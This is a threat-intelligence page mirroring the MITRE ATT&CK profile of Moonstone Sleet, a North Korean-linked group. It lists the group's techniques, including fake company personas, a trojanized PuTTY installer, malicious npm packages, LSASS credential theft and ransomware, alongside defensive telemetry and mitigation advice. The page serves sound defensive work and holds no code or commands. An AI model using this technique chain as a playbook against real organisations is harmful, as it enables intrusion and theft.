G1036: Moonstone Sleet
Moonstone Sleet is a North Korean-linked threat actor executing both financially motivated attacks and espionage operations. The group previously overlapped significantly with another North Korean-linked entity, Lazarus Group, but has differentiated its tradecraft since 2023. Moonstone Sleet is notable for creating fake companies and personas to interact with victim entities, as well as developing unique malware such as a variant delivered via a fully functioning game.[1]
Analyst context for executives and security teams
Moonstone Sleet matters because ATT&CK describes a group that combines social engineering infrastructure, fake companies/personas, financially motivated activity, and espionage-oriented operations. For leaders, the practical risk is not one single malware family or platform; it is whether the organization can validate people, files, software sources, and post-compromise behavior before an intrusion becomes credential theft, persistence, command-and-control, or ransomware impact.
Executive priority
Prioritize this as a readiness test across identity, SOC monitoring, incident response, and third-party trust. Executives should ask whether recruiting, vendor, developer, and business-development workflows can spot fake personas and suspicious files; whether SOC coverage includes credential access and persistence behaviors; and whether ransomware resilience covers Windows, Linux, VMware ESXi, and cloud/IaaS systems where relevant to local infrastructure. The ATT&CK relationships make this useful for control prioritization and audit evidence: prove you can detect and respond to phishing, malicious files, software supply chain concerns, LSASS access, scheduled tasks, service execution, registry run keys, web-based C2, tool transfer, and data encryption activity.
Technical view
ATT&CK does not provide a dedicated detection section for Moonstone Sleet, so defenders should validate coverage from the related techniques. Build detections around the chain implied by the relationships: resource development using domains, VPSs, email accounts, and social media accounts; initial access through spearphishing attachments, third-party services, malicious files, and possible software supply chain compromise; execution via user-opened files, services, or scheduled tasks; credential access against LSASS; discovery of users, browsers, systems, and network configuration; persistence through scheduled tasks and run keys; obfuscation, embedded or encoded payloads, and deobfuscation; C2 over web protocols; ingress tool transfer; and encryption for impact. Treat the Qilin relationship as a ransomware-context signal, while avoiding assumptions that every Moonstone Sleet case will use that software.
Likely telemetry
- Email security and attachment detonation results for spearphishing attachments
- Logs from collaboration, social, or third-party messaging services used for business communication
- DNS, proxy, web gateway, and firewall logs for new domains, VPS-hosted infrastructure, HTTP/S or WebSocket-like C2, and tool downloads
- Endpoint process creation, command-line, parent-child process, and file-write telemetry across monitored operating systems
- Windows security, Sysmon/EDR, service control manager, scheduled task, and registry autorun telemetry
Detection direction
- Map existing detections to the related ATT&CK techniques rather than relying on the group name alone.
- Validate visibility for third-party service phishing; many organizations monitor email better than social media, collaboration, or external messaging workflows.
- Tune phishing and malicious-file detections for business-context lures, fake companies, and functioning applications or games that may appear legitimate.
- Baseline and alert on unusual scheduled task creation, service execution, registry run key changes, and suspicious child processes from user-opened files.
- Harden and monitor for LSASS access attempts, especially when paired with discovery commands or lateral movement preparation.
Mitigation priorities
- Start with identity and social-engineering controls: phishing-resistant MFA where practical, strong account recovery controls, user reporting paths, and verification procedures for new vendors, recruiters, developers, and business contacts.
- Reduce malicious-file execution risk with attachment controls, sandboxing, application control, least privilege, and restrictions on untrusted executables/scripts.
- Strengthen software supply chain governance: verify trusted sources, signed releases, update mechanisms, and change control for software introduced into the environment.
- Protect credentials by limiting local admin rights, hardening LSASS exposure, and monitoring privileged account use.
- Reduce persistence opportunities by controlling scheduled task, service, and autorun creation privileges and reviewing deviations from baseline.
Analyst notes and limits
This take is based on ATT&CK G1036, its official description, the Microsoft external reference, and the supplied ATT&CK relationships. The most decision-useful feature is the breadth of behaviors: persona/resource development, phishing and malicious files, supply chain concerns, credential access, persistence, C2, tool transfer, obfuscation, and ransomware impact context. Local risk depends on whether the organization’s business processes expose employees to external personas and whether telemetry covers the related platforms and techniques.
MITRE provides no official detection text for this group, and the group object itself lists no platforms or tactics. Platform references here come only from the related software and techniques. This summary does not assert current activity against any specific sector, customer, or environment, and it does not guarantee detection coverage without local telemetry validation.
Moonstone Sleet
Moonstone Sleet is a North Korean-linked threat actor executing both financially motivated attacks and espionage operations. The group previously overlapped significantly with another North Korean-linked entity, Lazarus Group, but has differentiated its tradecraft since 2023. Moonstone Sleet is notable for creating fake companies and personas to interact with victim entities, as well as developing unique malware such as a variant delivered via a fully functioning game.[1]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1587.001 | Malware Sub-technique | Moonstone Sleet has developed custom malware, including a malware delivery mechanism masquerading as a legitimate game.CitationMicrosoft Moonstone Sleet 2024 |
| Enterprise | T1033 | System Owner/User Discovery | Moonstone Sleet deployed various malware such as YouieLoader that can perform system user discovery actions.CitationMicrosoft Moonstone Sleet 2024 |
| Enterprise | T1071.001 | Web Protocols Sub-technique | Moonstone Sleet used curl to connect to adversary-controlled infrastructure and retrieve additional payloads.CitationMicrosoft Moonstone Sleet 2024 |
| Enterprise | T1585.002 | Email Accounts Sub-technique | Moonstone Sleet has created email accounts to interact with victims, including for phishing purposes.CitationMicrosoft Moonstone Sleet 2024 |
| Enterprise | T1589.002 | Email Addresses Sub-technique | Moonstone Sleet gathered victim email address information for follow-on phishing activity.CitationMicrosoft Moonstone Sleet 2024 |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Moonstone Sleet delivered payloads using multiple rounds of obfuscation and encoding to evade defenses and analysis.CitationMicrosoft Moonstone Sleet 2024 |
| Enterprise | T1591 | Gather Victim Org Information | Moonstone Sleet has gathered information on victim organizations through email and social media interaction.CitationMicrosoft Moonstone Sleet 2024 |
| Enterprise | T1053.005 | Scheduled Task Sub-technique | Moonstone Sleet used scheduled tasks for program execution during initial access to victim machines.CitationMicrosoft Moonstone Sleet 2024 |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | Moonstone Sleet used registry run keys for process execution during initial victim infection.CitationMicrosoft Moonstone Sleet 2024 |
| Enterprise | T1204.002 | Malicious File Sub-technique | Moonstone Sleet relied on users interacting with malicious files, such as a trojanized PuTTY installer, for initial execution.CitationMicrosoft Moonstone Sleet 2024 |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | Moonstone Sleet delivered various payloads to victims as spearphishing attachments.CitationMicrosoft Moonstone Sleet 2024 |
| Enterprise | T1027 | Obfuscated Files or Information | Moonstone Sleet delivers encrypted payloads in pieces that are then combined together to form a new portable executable (PE) file during installation.CitationMicrosoft Moonstone Sleet 2024 |
| Enterprise | T1583.003 | Virtual Private Server Sub-technique | Moonstone Sleet registered virtual private servers to host payloads for download.CitationMicrosoft Moonstone Sleet 2024 |
| Enterprise | T1105 | Ingress Tool Transfer | Moonstone Sleet retrieved a final stage payload from command and control infrastructure during initial installation on victim systems.CitationMicrosoft Moonstone Sleet 2024 |
| Enterprise | T1016 | System Network Configuration Discovery | Moonstone Sleet has gathered information on victim network configuration.CitationMicrosoft Moonstone Sleet 2024 |
| Enterprise | T1598.003 | Spearphishing Link Sub-technique | Moonstone Sleet used spearphishing messages containing items such as tracking pixels to determine if users interacted with malicious messages.CitationMicrosoft Moonstone Sleet 2024 |
| Enterprise | T1003.001 | LSASS Memory Sub-technique | Moonstone Sleet retrieved credentials from LSASS memory.CitationMicrosoft Moonstone Sleet 2024 |
| Enterprise | T1608.001 | Upload Malware Sub-technique | Moonstone Sleet staged malicious capabilities online for follow-on download by victims or malware.CitationMicrosoft Moonstone Sleet 2024 |
| Enterprise | T1598 | Phishing for Information | Moonstone Sleet has interacted with victims to gather information via email.CitationMicrosoft Moonstone Sleet 2024 |
| Enterprise | T1195.002 | Compromise Software Supply Chain Sub-technique | Moonstone Sleet has distributed a trojanized version of PuTTY software for initial access to victims.CitationMicrosoft Moonstone Sleet 2024 |
| Enterprise | T1569.002 | Service Execution Sub-technique | Moonstone Sleet used intermediate loader malware such as YouieLoader and SplitLoader that create malicious services.CitationMicrosoft Moonstone Sleet 2024 |
| Enterprise | T1583.001 | Domains Sub-technique | Moonstone Sleet registered domains to develop effective personas for fake companies used in phishing activity.CitationMicrosoft Moonstone Sleet 2024 |
| Enterprise | T1217 | Browser Information Discovery | Moonstone Sleet deployed malware such as YouieLoader capable of capturing victim system browser information.CitationMicrosoft Moonstone Sleet 2024 |
| Enterprise | T1566.003 | Spearphishing via Service Sub-technique | Moonstone Sleet has used social media services to spear phish victims to deliver trojainized software.CitationMicrosoft Moonstone Sleet 2024 |
| Enterprise | T1486 | Data Encrypted for Impact | Moonstone Sleet has deployed ransomware in victim environments.CitationMicrosoft Moonstone Sleet 2024 |
| Enterprise | T1585.001 | Social Media Accounts Sub-technique | Moonstone Sleet has created social media accounts to interact with victims.CitationMicrosoft Moonstone Sleet 2024 |
| Enterprise | T1587 | Develop Capabilities | Moonstone Sleet developed malicious npm packages for delivery to or retrieval by victims.CitationMicrosoft Moonstone Sleet 2024 |
| Enterprise | T1082 | System Information Discovery | Moonstone Sleet has gathered information on victim systems.CitationMicrosoft Moonstone Sleet 2024 |
| Enterprise | T1027.013 | Encrypted/Encoded File Sub-technique | Moonstone Sleet has used encrypted payloads within files for follow-on execution and defense evasion.CitationMicrosoft Moonstone Sleet 2024 |
| Enterprise | T1027.009 | Embedded Payloads Sub-technique | Moonstone Sleet embedded payloads in trojanized software for follow-on execution.CitationMicrosoft Moonstone Sleet 2024 |
Groups, software, and campaigns
S1242: Qilin
Qilin is a ransomware family operated as a ransomware-as-a-service (RaaS) that has been active since at least 2022. It includes variants written in Go and Rust capable of targeting Windows, Linux, and VMware ESXi environments. Qilin shares functionality overlaps with Black Basta, REvil, and BlackCat ransomware. Qilin affiliates have targeted multiple entities worldwide with the majority of victims in the US, France, Canada, and the UK, primarily in the manufacturing, technology, financial services, and healthcare sectors.[1][2][3][4][5]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | 63c67cbad290… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Microsoft Moonstone Sleet 2024
Microsoft Threat Intelligence. (2024, May 28). Moonstone Sleet emerges as new North Korean threat actor with new bag of tricks. Retrieved August 26, 2024.
Open source URL -
[2]
Storm-1789
(Citation: Microsoft Moonstone Sleet 2024)
-
[3]
mitre-attack G1036Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.